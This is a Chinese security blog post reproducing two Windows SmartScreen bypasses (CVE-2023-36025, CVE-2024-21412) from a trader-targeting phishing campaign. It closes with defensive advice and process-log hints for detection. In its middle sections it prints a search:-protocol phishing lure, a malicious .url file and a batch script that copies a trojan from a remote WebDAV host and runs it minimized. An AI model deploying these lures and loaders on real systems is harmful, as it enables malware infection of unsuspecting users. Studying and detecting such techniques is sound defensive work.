Windows SmartScreen安全功能绕过漏洞(含CVE-2024-21412复现)

admin 2024年2月29日13:10:03评论64 views字数 4294阅读14分18秒阅读模式

前言

20242月微软发布了一个Internet快捷方式文件安全功能绕过漏洞(CVE-2024-21412),互联网上未经身份验证的攻击者可以向目标用户发送旨在绕过显示的安全检查的特制文件,诱导用户点击实现恶意代码执行。在说这个漏洞之前,先看一个之前的Windows SmartScreen安全功能绕过漏洞。

CVE-2023-36025

CVE-2023-36025是微软于11月补丁日发布的安全更新中修复Windows SmartScreen安全功能绕过漏洞。攻击者可以通过诱导用户点击特制的URL文件,对目标系统进行攻击。成功利用该漏洞的攻击者能够绕过Windows Defender SmartScreen检查及其相关提示。该漏洞的攻击复杂性较低,可创建并诱导用户点击恶意设计的 Internet 快捷方式文件 (.URL) 或指向此类文件的超链接来利用该漏洞,无需特殊权限即可通过互联网进行利用。

简单看下漏洞的利用方式。首先搭建一个WebDAV文件共享服务器,写一个弹calc的测试脚本充当拉取执行木马的恶意脚本,压缩到一个zip文件,将zip文件放到WebDAV共享目录里。

Windows SmartScreen安全功能绕过漏洞(含CVE-2024-21412复现)

构造恶意的url文件,其中URL填入远程zip文件下的cmd文件。

 Windows SmartScreen安全功能绕过漏洞(含CVE-2024-21412复现)

双击url文件,test.exe被下载执行。正常情况下用户双击来自网络的可执行文件的时候,会触发Windows Defender SmartScreen的检查。然而,当点击恶意url文件windows会先解压远程zip文件并放入临时目录,然后执行cmd文件,没有触发相关的安全警告

虽然临时解压了文件到本地,但cmd文件本质上还是来自于网络上的可执行文件,应该触发Windows Defender SmartScreen的检查,但却没有触发,这就是漏洞所在。

Windows SmartScreen安全功能绕过漏洞(含CVE-2024-21412复现)

CVE-2024-21412

根据外网上一篇对Water Hydra攻击活动完整分析文章(https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html?utm_source=trendmicroresearch&utm_medium=smk&utm_campaign=0224_waterhydraCVE202321412)可以找到CVE-2024-21412漏洞利用的一些详细信息,本文的复现也主要基于该文章。该组织的攻击活动利用CVE-2024-21412绕过Microsoft Defender SmartScreen安全提醒,用DarkMe恶意软件感染用户。

在攻击链中,Water Hydra在外汇交易论坛和股票交易Telegram频道上部署了鱼叉式网络钓鱼活动,利用各种社会工程技术(例如发布请求或提供交易的消息),引诱交易者感染DarkMe恶意软件。攻击者会诱导用户进入一个受感染的俄罗斯加密货币信息网站,该网页上有一个指向股票图表(实际上是远控木马)URL,而受害者往往会被引诱点击该链接。一旦点击了该连接并在本地资源管理器打开,很容易被诱导点击伪装成图片的远程恶意URL文件,从而感染木马。

初始的钓鱼网站类似于如下所示,这其实是一个精心构造的html网页,其中包含了一个指向指向恶意WebDAV共享的链接,其中包含了经过精心设计的视图。当用户单击此链接时,浏览器将要求他们在Windows资源管理器中打开该链接。由于这并非安全提示,因此用户可能不会认为该链接是恶意的。

Windows SmartScreen安全功能绕过漏洞(含CVE-2024-21412复现)

当用户选择了打开后,在这里攻击者滥用了Microsoft Windows 搜索的应用程序协议来引诱受害者点击恶意Internet快捷方式(.url)文件。search:协议调用Windows桌面搜索应用程序。在这里利用search:协议和精心设计的高级查询语法 (AQS) 查询来自定义Windows资源管理器视图的外观,以欺骗受害者。

<! DOCTYPE html><htm1><head>Photo Download</head><body><p>    <a href="search:query=photo_2024-02-28.jpg&crumb=location:\101.33.117.154@8077webdavimages&displayname=Downloads">photo_2024-02-28.jpg</a></p></body></html>

Windows SmartScreen安全功能绕过漏洞(含CVE-2024-21412复现)

上图显示了包含恶意搜索的HTML URL链接。search:应用程序协议来执行对photo_2024-02-28.jpg 的搜索crumb 参数将搜索范围限制为恶意 WebDAV 共享,而DisplayName 元素欺骗用户使其认为这是本地下载文件夹。

打开资源管理器后效果如下所示,里面看起来是图片的文件,其实是经过伪装的远程恶意url文件:

Windows SmartScreen安全功能绕过漏洞(含CVE-2024-21412复现)

这会导致用户相信来自恶意WebDAV服务器的文件已被下载,从而诱骗他们点击伪造的JPEG图像的恶意文件。由于Microsoft Windows无论是否设置显示扩展名,都会自动隐藏.url扩展名,而且.url文件的图标可以进行设置,这使得文件看起来更像JPEG图像文件(实际上是photo_2024-02-28.jpg.url,很容易诱导点击。而CVE-2024-21412 的利用方式就隐藏在这个url文件中。

CVE-2024-21412主要利用的也是互联网快捷方式文件,可以理解为CVE-2023-36025修复的绕过。这些.url文件属于INI配置文件,采用指向URL"URL="参数。.url文件中,可以使用imagress.dllWindows图像资源)图标库,使用IconFile =IconIndex=参数将默认的互联网快捷方式文件更改为图像图标,以进一步欺骗用户。

photo_2024-02-28.jpg.url内容和伪装效果如下:

 Windows SmartScreen安全功能绕过漏洞(含CVE-2024-21412复现)

文件中的URL参数指向托管在WebDAV服务器上的另一个Internet快捷方式文件。test.url文件中是先前修补的Microsoft Defender SmartScreen绕过漏洞CVE-2023-36025)的利用逻辑:

[InternetShortcut]URL=file://10.xx.xx.xx@8077/webdav/cxm.zip/cxm.cmdIDList=HotKey=0[{000214AO-0000-0000-c000-000000000046}]Prop3=19,9

cmd文件内容如下,从远程WebDAV服务器copy木马文件并执行:

@echo offif not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exitcopy /b \10[email protected] %TEMP%test.execd %TEMP%cmd /c test.exeexit

这段批处理脚本还有一个技巧,第二行的作用是检测是否设置了 IS_MINIMIZED 环境变量。如果没有,就会最小化启动同一个批处理文件的新实例,并在新窗口中执行其余的脚本,然后关闭原始的命令提示符窗口。这样,用户看到的批处理文件执行效果是它以最小化的状态在执行。

通过双击第一个伪装成JPEG的互联网快捷方式文件,就可以利用CVE-2024-21412绕过Microsoft Defender SmartScreen,并开始控制受害者机器

在一个互联网快捷方式中引用另一个互联网快捷方式是非常奇怪的。安全研究员在测试中发现初始快捷方式中引用第二个快捷方式可以绕过CVE-2023-36025的补丁,从而逃避SmartScreen保护。这是因为SmartScreen无法正确应用Mark-of-the-Web (MotW),这是一个关键的Windows组件,用于在打开时提醒用户或运行来自不受信任来源的文件。如下是应用 MotW后应显示的Microsoft Defender SmartScreen窗口

 Windows SmartScreen安全功能绕过漏洞(含CVE-2024-21412复现)

总结来说就是通过精心设计的Windows资源管理器视图,能够诱使受害者点击CVE-2024-21412漏洞利用的远程.url文件,该漏洞导致在不提醒用户的情况下执行来自不受信任来源的代码,依赖于Windows无法正确应用MotW并导致缺SmartScreen保护。绕过SmartScreen后,第二个.url快捷方式会运行嵌入在攻击者WebDAV共享的ZIP文件中的批处理文件,批处理脚本从恶意WebDAV共享复制并执行木马程序。整个攻击在用户不知情和SmartScreen保护的情况下运行。

攻击链完成后,用户机器还会下载真实的JPEG文件,该文件与利用CVE-2024-21412漏洞JPEG文件同名。该文件会打开来欺骗受害者,让用户认为自己已经打开了从伪造的下载文件夹中看到JPEG文件,并对木马感染毫不知情

而在打了最新补丁的机器上测试,是这个效果,会进行安全提醒:
Windows SmartScreen安全功能绕过漏洞(含CVE-2024-21412复现) 

Windows SmartScreen安全功能绕过漏洞(含CVE-2024-21412复现)

笔者认为这个漏洞虽然看起来比较鸡肋,看似就是绕过了一个安全提醒,但其实伪装性非常强,可以伪造一个下载目录资源管理器,并且无论文件查看如何设置,.url文件都会自动隐藏后缀,还可以通过ini配置来设置图标,非常容易诱导人去点击(其实安全意识差的人也不差SmartScreen这一层安全提醒= =),结合起来钓鱼还是比较容易。

防御措施

·及时更新微软2月最新补丁;

·从浏览器转到资源管理器时,仔细辨别要点击文件的文件类型;
·对rundll32异常的命令行进行检测。在进行测试时,产生了如下进程日志:
svchost.exe --> rundll32.exe C:Windowssystem32davclnt.dll,DavSetCookie 10.xx.xx.xx@8077 http://10.xx.xx.xx:8077/WebDAV/cxm.cmdexplorer.exe --> C:Windowssystem32cmd.exe /K "\[email protected]"

各位佬自行参考写规则吧。

注:本文内容仅用于研究学习,不可用于网络攻击等非法行为,否则造成的后果均与本文作者和本公众号无关,维护网络安全人人有责~

原文始发于微信公众号(红蓝攻防研究实验室):Windows SmartScreen安全功能绕过漏洞(含CVE-2024-21412复现)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月29日13:10:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Windows SmartScreen安全功能绕过漏洞(含CVE-2024-21412复现)http://cn-sec.com/archives/2534802.html

发表评论

匿名网友 填写信息